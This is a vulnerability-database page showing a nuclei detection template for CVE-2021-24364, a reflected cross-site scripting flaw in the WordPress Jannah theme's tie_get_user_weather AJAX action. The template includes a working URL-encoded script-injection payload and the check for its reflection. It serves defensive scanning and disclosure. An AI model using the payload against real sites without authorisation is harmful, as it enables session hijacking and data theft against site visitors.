Lucene search
K

WordPress Jannah Theme <5.4.4 - Cross-Site Scripting

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 43 Views

WordPress Jannah Theme <5.4.4 - Cross-Site Scripting vulnerability, allows injection of malicious scripts into web pages, leading to data theft, session hijacking, or website defacement. Update to version 5.4.4 or later to fix

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-24364
27 Apr 202309:58
circl
CNNVD
WordPress 跨站脚本漏洞
21 Jun 202100:00
cnnvd
CVE
CVE-2021-24364
21 Jun 202119:18
cve
Cvelist
CVE-2021-24364 Jannah < 5.4.4 - Reflected Cross-Site Scripting (XSS)
21 Jun 202119:18
cvelist
EUVD
EUVD-2021-11277
7 Oct 202500:30
euvd
NVD
CVE-2021-24364
21 Jun 202120:15
nvd
OSV
CVE-2021-24364
21 Jun 202120:15
osv
Patchstack
WordPress Jannah premium theme <= 5.4.3 - Reflected Cross-Site Scripting (XSS) vulnerability
7 Jun 202100:00
patchstack
Prion
Cross site scripting
21 Jun 202120:15
prion
RedhatCVE
CVE-2021-24364
22 May 202518:23
redhatcve
Rows per page
id: CVE-2021-24364

info:
  name: WordPress Jannah Theme <5.4.4 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: WordPress Jannah theme before 5.4.4 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update the WordPress Jannah Theme to version 5.4.4 or later, which includes a fix for this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24364
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/crpytoscooby/resourses_web
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24364
    cwe-id: CWE-79
    epss-score: 0.01975
    epss-percentile: 0.78026
    cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: tielabs
    product: jannah
    framework: wordpress
  tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - '/wp-content/themes/jannah/assets/'
          - 'attachment-jannah-image-'
        condition: or

  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a004630440220266465c7c32723838dfb5f8cbc1b6b6f0cc540ddd8d18f3c25f9ac42a9db20a8022035955269b75a4bf3a624ff2674b9f1ed589167d3a9681890d2e85a93f8c33c06:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 24.3
CVSS 3.16.1
EPSS0.01975
43